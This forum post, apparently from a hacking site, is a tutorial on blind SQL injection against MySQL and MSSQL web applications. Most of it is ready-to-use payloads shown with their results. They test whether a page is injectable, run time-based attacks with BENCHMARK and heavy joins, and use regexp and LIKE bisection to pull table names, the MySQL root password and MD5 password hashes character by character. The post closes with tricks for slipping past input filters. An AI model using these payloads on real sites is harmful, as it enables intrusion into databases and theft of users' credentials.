Best Telegram Programming Groups For Coders &Developers   It Wasn’t Me - Secure Your Account   Mr.Robot All Seasons 1,2,3 Full | Free Torrent Download   Mr.Robot All Seasons 1,2,3,4 Full | Watch Online [FREE]   5 Tips Will Keep You Safe During Christmas Holiday’s Online Shopping   You Can Get All Adobe Apps For $30 a Month Right Now   How To Wipe An iPhone Clean (ERASE) Before Selling?   Programming Languages To Learn To Be An Expert Hacker!   Cybercriminals exchange tips on underground forums about avoiding arrests   A comprehensive look into emerging Signal encrypted messaging application   A Detailed Comparison of WhatsApp, Telegram & Signal   How Telegram End-to-end Encryption Works To Provide Security ?   Flubot Malware is Spreading Quickly Through Android Devices   WhatsApp End-to-End Encryption and its Privacy Importance - Alternatives,Signal & Telegram   What is Credit Card Skimming And How To Protect Yourself From it ?   Where to hire react programmer and 3 essential skills to look for   Top 8 Basic Google Search Dorks [Live Examples]   [Penetration Testing] Top 70 Most Interview Questions   Why VPN Is Necessary ? [Detailed Guide]   Top 10 Dangerous Viruses Of All Times   List Of Common HTTP Error Status Codes   “Hello World!” Program In Different Programming Languages   100 Basic Computer Related G.K. Questions   Email Security - Tips And Tricks   Fonts Hub Collection (Free Design Resources)   Top 8 Softwares Free Download - No Credit Card Needed [2022 Update]   Shortcomings That Leads An Entrepreneur Towards Failure   5 Basic Steps To Protect Your Personal Data Online   What is Intel SGX and What are the Benefits ?   15 Things You Need to Know About Maintaining The Logs   How to think like a programmer - lessons in problem solving   How To Get Voice Like Anonymous Voice   Life Story of Microsoft Founder Bill Gates - Documentary   Own Private Search Engine in Linux Will Save Our Privacy   Best Etcher alternatives to Create Bootable USB   Music For Programming - Coding Music / Hacking Music   School Management Software v3.1 Premium + Crack   JavaFX Chat Client/Server + Source Code   Top 25 Keyword Research Tools [Search Engine Optimization]   A Quick SEO Checklist - 2023 Update   Online Domain Authority (DA) Rank Checker Websites   33 Things In SEO For Which Google Will Give Your Student Blog High Positions   How to Close the Site from indexing using robots.txt   10 SEO Tools all Small Businesses Need in 2023   Earth Rise Application + Code   Animation along a path + Code   Zen Pong Game in Java Language + Code   Simple Flying Bird Game + Code Files   Game Snake Simple + Code Files   The Space 'Sun & Earth' | HTML,CSS,JavaScript   File System in Web (Explorer in Windows and Finder in OSX)   Admin Dashboard Template built using Bootstrap + Code   Website Template For Admin Dashboard + Code   Youtube Playlist Downloader Script   How To Create A Stopwatch In Python   Python TicTacToe with Tk and minimax AI   Deskreen turns any device with a web browser into a secondary screen for your computer   Download Algorithms Book | Dummies Store   OSI Model And TCP/IP Model   How to Fix SSH Failed Permission Denied (publickey,gssapi-keyex,gssapi-with-mic)   What Is Load Balancing? Definition and How It Works   How to Setup FTP Server on Your Raspberry Pi   Download Windows 10 Lite Edition x64 | Direct Link   How To Recover Permanently Deleted Files In Windows 10 ?   How to make Fake Error Message Script in Windows   20 Essential Windows keyboard Shortcuts that will make you forget your mouse   How To Fix The DLL Missing Error In Windows 7 ?   Create Hotspot on Windows 10 in 6 steps   Download Microsoft Office Professional Plus 2016   Download DriverPack Solution Offline | Full   How To Create Simple And Password Protected ZIP File in Linux   2 Ways To Save Terminal Output of a Command in Linux   6 Best Tools to Monitor Disk IO Performance in Linux   Top 15 Best Websites (Blogs) to Learn Linux Online   How to Delete files older than 30 Days in Linux   What is the difference between apt and apt-get command   Fail2Ban Installation & Setup: Ubuntu, CentOS, Fedora & Debian   How to List Running Processes in Linux   How to Use the who Command in Linux with Examples   FOREMOST - Recover Permanently Deleted Files Easily in Kali Linux   Funny Linux Commands to Try   Command line interface guidelines, to help you write better command-line programs ...   How to Install Google Chrome Web Browser on Ubuntu 20.04   Learn Adobe Photoshop | 33 Episode Course   Window Privilege Escalation: Automated Script   Linux Privilege Escalation: Automated Script   How To Retrieve & Decrypt Stored Passwords in Firefox & Chrome Remotely   ACLight: An Advanced Privileged Account Discovery Tool   How to change Lock Screen Background on Kali Linux XFCE   Best 20 Kali Linux Tools For Hacking And Penetration Testing   How to Run Windows Application and Games on Kali Linux   How to run C and C++ programs in Kali Linux   Control Kali Linux PC From any Mobile or Tablet   How to Enable root User Account in Kali Linux   How to Configure Static IP address in Kali Linux   Bash vs ZSH in Kali Linux   [Solved] E: Unable to locate package in Kali Linux   Hosting a Local Website with Domain Name on Kali Linux over WiFi   Install Docker in Kali Linux and Run Other OS   How to Install Kali Linux | A Total Guide to Install Kali Linux   NetHunter Rootless - Official Kali NetHunter for non rooted phones   How to set up own VPN server in 10 minutes on Kali Linux using OpenVPN   Configuring The ProxyChains   Install Python3 in Kali Linux   TempoMail - Command Line Temporary Email in Linux   NIPE - Fully Anonymize Total Kali Linux System   How to Install Google Chrome & Chromium on Kali Linux [Official Method]   15 Best Laptops For Kali Linux & Cyber Security - Check This Before Buy   Volatolity - Digial Forensic Testing of RAM on Kali Linux   Limit the Internet Speed of LAN Users [Evil Limiter]   Find Virtual Machine IP Through Kali Linux - 3 Methods   Privilege Escalation with PowerShell Empire and SETOOLKIT [Kali Linux]   How to use kill, pkill and killall Commands to Kill any Linux Process   20 Useful Tar Commands For Extraction and Compression   Create a Fake AP with DNSMASQ and HOSTAPD [Kali Linux]   How to Fully Anonymize Your Linux System with Tor using Nipe   Hack Windows/Linux using ARCANUS Framework – 100% FUD   Simple and Target Mac Flooding - Kali Linux   Get Free Kali Linux on AWS with Public IP - Real Time Penetration Testing   What’s the difference Between Tails and Tor browser?   Does Tor Hide you From Your ISP? Should I surf internet using Tor ?   Wireshark for Pentester: Decrypting RDP Traffic   Exploit Wi-Fi Vulnerabilities with Routersploit on Termux and Linux   Man in The Middle Attack & How To Prevent it   Masscan - 1000 Times Faster Than NMAP   Wireshark - Shark in Wires | Network Protocol Analyzer in Kali Linux   Wifite - Easy Automated Wireless Attack   WiFi-Pumpkin 3 - Dangerous Access Point   Evil Twin Attack with DNSMASQ - Wireless WPA2-PSK Cracking   Sniffing with Rogue Access Point [DNSMASQ and TCPFLOW]   Hack Wi-Fi Settings of Windows Machine Remotely [After Meterpreter]   Wi-Fi deauthentication attack against 802.11 protocol   Bypass Hidden SSID in a Wireless Network [Full Proof Method]   Crack WPA/WPA2-PSK using Aircrack-ng and Hashcat   Crack WPA2-PSK Wi-Fi with automated python script - FLUXION PART 1   Set Default Version of Python : [SOLVED] update-alternatives: error: no alternatives for p   Python Scripting: Information Gathering and Automating Ethical Hacking   15 Essential Meterpreter Commands Everyone Should Know   Find Vulnerable Webcams with Shodan [Metasploit Framework]   TCP & SYN Scanning with Metasploit Framework without NMAP   Meterpreter Useful Top 60 Commands List   The Web Application Hacker's Handbook 2   Hacking GPS Book   MadCam - Termux Hack Front camera by Sending link   How to Download Files In Termux   IPdrone Termux - Find Location of Person it IP in Termux   ReconDog Termux - Best Reconnaissance Tool For Termux   Termux SSH: Use Termux in Windows Using SSH Server   How to Install and Use Fsociety-Tool In Termux   Termux-YTD : Download Youtube Videos with Termux   Use CMatrix Package Like a Pro   L3MON - Access Android Devices Remotely   Hack Android using Metasploit over LAN/WAN   Ghost Framework - Control Android Devices Remotely   Top 10 Vulnerable Android Applications [Penetration Testing]   Find Hidden Subdomains on Any Website with Subfinder   Blind Sql Injection with Regular Expressions Attack   Useful Google Dorks For Bug Bounty Hunters   HTML5 Security CheatSheet - What your browser does when you look away...   30,000 Sites Is In RISK, The Plus Addons For Elementor WordPress Plugin Hacked   WPScan - Find Vulnerabilities in WordPress Websites on Kali Linux   Wapiti - Automated Vulnerability Scanner   Generate 100% FUD Backdoor with TheFatRat - Windows 10 Exploitation   TheFatRat hacking tool to create undetectable backdoors   How to Make a Keylogger in Python + Code   How to create a keylogger in PowerShell ?   Backdoor Program using Python (Remote Access Explain)   Man in the Middle Attack with Websploit Framework   Hack Windows 10 Remotely over WAN with Metasploit [No Port Forwarding]   15 Powerful Gadgets For Ethical Hackers | Hardware Tools for Hackers   Find Vulnerabilities using NMAP Scripts (NSE)   Free Vulnerability Database And Resources   Firefox Browser Vulnerable to (MITM) Man-in-the-Middle Attack   Find Vulnerabilities in Military Networks By Participating Hack The Army Bug Bounty Progr. 

x32x01

ADMINISTRATOR
Blind-Sql-Injection.jpg
Why Blind SQL Injection?
Blind SQL Injection is used when a web application is vulnerable to an SQL injection, but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

How Blind SQL Injection can be used?
There are several uses for the Blind SQL Injection:
  • Testing the vulnerability;
  • Finding the table name;
  • Exporting a value;
Every techniques are based on the ‘guess attack’, because we only have two different input:

TRUE or FALSE. Let me explain better…

Testing vulnerability (MySQL – MSSQL):
Let’s star with an easy example. We have this type of URL:
Code:
example.com/news.php?id=2

it will result in this type of query on the database:
Code:
SELECT * FROM news WHERE ID = 2

Now, we can try some SQL Injection techniques, for example the Blind SQL injection!
Code:
example.com/news.php?id=2 and 1=0

SQL query is now:
Code:
SELECT * FROM news WHERE ID = 2 and 1=0

In this case the query will not return anything (FALSE) because 1 is different from 0; Let’s do the litmus test: try to get the TRUE statement forcing the AND to be TRUE;
Code:
example.com/news.php?id=2 and 0=0

In this case 0 is equal to 0… Got it! We should now see the original news page. We now know that is vulnerable to Blind Sql Injection.

Time attack (MySQL)
When you can’t see any kind of results, you must use the time attack. In this example we will try to obtain the password of root user in MySQL (if your have root privileges on MySQL). BENCHMARK function is used to sleep for some seconds.

Syntax: BENCHMARK (how many times,thing to do). When you use it in IF statement, you will be able to make time attack in MySQL;
Code:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
Code:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='b',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
Code:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='c',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;
Code:
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='d',BENCHMARK(100000,SHA1(1)),0) User,Password
FROM mysql.user WHERE User = ‘root’;

And so on until you will see the BENCHMARK running (few more seconds delay). Now proceed with the 2nd word of the password…

Time attack (MSSQL)
In this example we will try to obtain the username of the sysusers table. A simple way to generate time delays is to take advantage of one of the biggest database problems, that have made necessary the development of performance-tuning techniques; heavy queries. All you need to generate a time delay is to access a table that has some registers and to build a good query to force the engine to work. In other words, we need to build a query ignoring what the performance best practices recommend. (This technique was made by Chema Alonso, Microsoft Security MVP)
Code:
example.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as
sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,
sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers)

Positive result. The condition is true, and the response has a delay of 14 seconds. We actually know that the ASCII value of the first username’s letter in the sysusers table is lower than 300.
Code:
example.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as
sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,
sysusers AS sys7, sysusers AS sys8)>1 and 0 >(select top 1 ascii(substring(name,1,1))
from sysusers)

Negative Result. One-second response delay. We actually know than the ASCII value of the first username’s letter in the sysusers table is higher than 0.

And so on for all the possibilities:
Code:
[...] >1 and 300 >(select top 1 ascii(substring(name,1,1)) from sysusers) →14
seconds →TRUE
Code:
[...] >1 and 0 >(select top 1 ascii(substring(name,1,1)) from sysusers) →1 second →
FALSE
Code:
[...] >1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) →14
seconds →TRUE
Code:
[...] >1 and 75 >(select top 1 ascii(substring(name,1,1)) from sysusers) →1 second → FALSE
Code:
[...] >1 and 100 >(select top 1 ascii(substring(name,1,1)) from sysusers) →1 second
→FALSE
Code:
[...] >1 and 110 >(select top 1 ascii(substring(name,1,1)) from sysusers) →1 second
→FALSE
Code:
[...] >1 and 120 >(select top 1 ascii(substring(name,1,1)) from sysusers) →14
seconds →TRUE
Code:
[...] >1 and 115 >(select top 1 ascii(substring(name,1,1)) from sysusers) →1 second
→FALSE
Code:
[...] >1 and 118 >(select top 1 ascii(substring(name,1,1)) from sysusers) →1 second
→FALSE
Code:
[...] >1 and 119 >(select top 1 ascii(substring(name,1,1)) from sysusers) →1 second
→FALSE

Then the result is ASCII(119)=’w‘.

Start with the second letter… and so on!

Regexp attack’s methodology
This is our own creation and it is the faster to extract information from a database. With this you can save a lot of time and bandwidth! The methodology is pretty simple: we define a range of numbers/chars/spacial chars that will be matched with REGEXP (MySQL) or LIKE (MSSQL) functions.

Let’s start with an example because is more simple to understand.

Finding table name with Regexp attack (MySQL)
In this example we will extract the first matched record of information_schema.tables, you must know the name of database!
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables LIMIT 0,1)

We tested the blind sql injection attack, and if we see the correct page, everything is ok.
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)

In this case we know that the first matched record start with a char between [a -> z] That example will show you how to extract the complete name of the record:
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-g]' LIMIT 0,1)
False
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-n]' LIMIT 0,1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-l]' LIMIT 0,1)
False
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1)
True

The first letter of the table is ‘n’. But are there other tables start with ‘n’?
Let’s change the limit to 1,1:
Code:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 1,1)
False

No, there are no more tables that start with ‘n’. From now on we must change the regular expression like this:
Code:
‘^n[a-z]’ -> ‘^ne[a-z]’ -> ‘^new[a-z]’ -> ‘^news[a-z]’ -> FALSE

To test if we found the correct table name, we must test something like this:
Code:
‘^news$’.

Finding table name with Regexp attack (MSSQL)
For MSSQL, the syntax is a little bit more complicated. There are two limitations: LIMIT and REGEXP are not present.

To bypass it, we must use TOP and LIKE functions. See that example:
Code:
default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" and table_name LIKE '[a-z]%' )
True

SELECT TOP is used to extract the first x record from information_schema table. In MSSQL, LIKE function is similar to REGEXP function in MySQL, but the syntax is not equal.

For learn more about LIKE functions consult http://msdn.microsoft.com/enus/library/ms179859.aspx

When you need to grab the second table_name, you must use “table_name NOT IN ( SELECT TOP x table_name FROM information_schema.tables)” like in the example below:

Code:
default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE
TABLE_SCHEMA="blind_sqli" and table_name NOT IN ( SELECT TOP 1 table_name
FROM information_schema.tables) and table_name LIKE '[a-z]%' )

The second SELECT TOP is used to exclude X row and extract the X+1.
Like in the MySQL example, we show how to modify LIKE expression, to extract the first row: ‘n[a-z]%’ -> ‘ne[a-z]%’ -> ‘new[a-z]%’ -> ‘news[a-z]%’ -> TRUE Otherwise MySQL ending, we have TRUE because ‘%’ define any string of zero or more characters.

To check the end, we must append “_” and verify if exist another character. ‘news%’ TRUE -> ‘news_’ FALSE.

Exporting a value with Regexp attack (MySQL)
In this example we will extract a MD5 hash from a know table name (in this case ‘users’);

Remember: MD5 can ONLY contain [a-f0-9] values.

We will use the same methodology described in the “Finding table name”.

Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[a-f]' AND
ID=1)
False
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[0-9]' AND
ID=1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[0-4]' AND
ID=1)
False
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[5-9]' AND
ID=1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^[5-7]' AND
ID=1)
True
Code:
index.php?id=1 and 1=(SELECT 1 FROM users WHERE password REGEXP '^5' AND
ID=1)
True

Our hash start with ‘5’ in just 6 try!

Exporting a value with Regexp attack (MSSQL)
Same thing as MySQL and “Finding Table name”. We now continue the search of second char. An example below:
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[a-f]%' AND
ID=1)
True
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[a-c]%' AND
ID=1)
False
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[d-f]%' AND
ID=1)
True
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5[d-e]%' AND
ID=1)
False
Code:
default.asp?id=1 AND 1=(SELECT 1 FROM users WHERE password LIKE '5f%' AND
ID=1)
True

We have found our second char is ‘f’ in just 5 try! (This is also the worst case for brute-force)

Time considerations
Take for example the MD5 case. We must export an hash of 32 chars using a Blind SQL Injection.

You know that there are only 16 chars to be tested (1234567890abcdef);
In an optimistic case, regexp and normal blind need 32 query to be done;
In a worst-case , regexp need 128 query and normal blind need 512 query;

Let’s take now a password case. We must export a 15 chars password mixalpha-numericspecial14.

You know that there are 76 chars to be tested (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=);

In an optimistic case, regexp and normal blind need 15 query to be done;
In a worst-case, regexp need approx 94 query and normal blind need 1140 query;

Bypassing filters
Below are examples of common filters bypass.

TRIM (NO SPACES ALLOWED):
Code:
SELECT/*not important*/1/*really...*/FROM/*im serious*/users →(open and
close a comment);
Code:
SELECT(1)FROM(information_schema.tables) →(parentheses's rules)

Special chars like:
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line

Example:
Code:
SELECT%09TABLE_NAME%09FROM%0dinformation_schema.tables

SPECIAL CHAR (NO ‘, “ ALLOWED):
Usually the ‘ AND “ are used to input some kind of string. So you can input the HEX
value:
Code:
SELECT passwd FROM users WHERE username=0x61646d696e

Where 0x61646d696e is the hex value of ‘admin’ Or also using the CHAR function:
Code:
SELECT passwd FROM users WHERE
username=CONCAT(CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110))

Conclusions
To conclude our paper, we must specify that:
1. Is possible make a “combo” attack using “Time Attack” or other;
2. The regexp that you will use, could also be a list of chars like “[abcdef0123456789]”;
3. Our English is fu**ing bad! 🙂
 
Top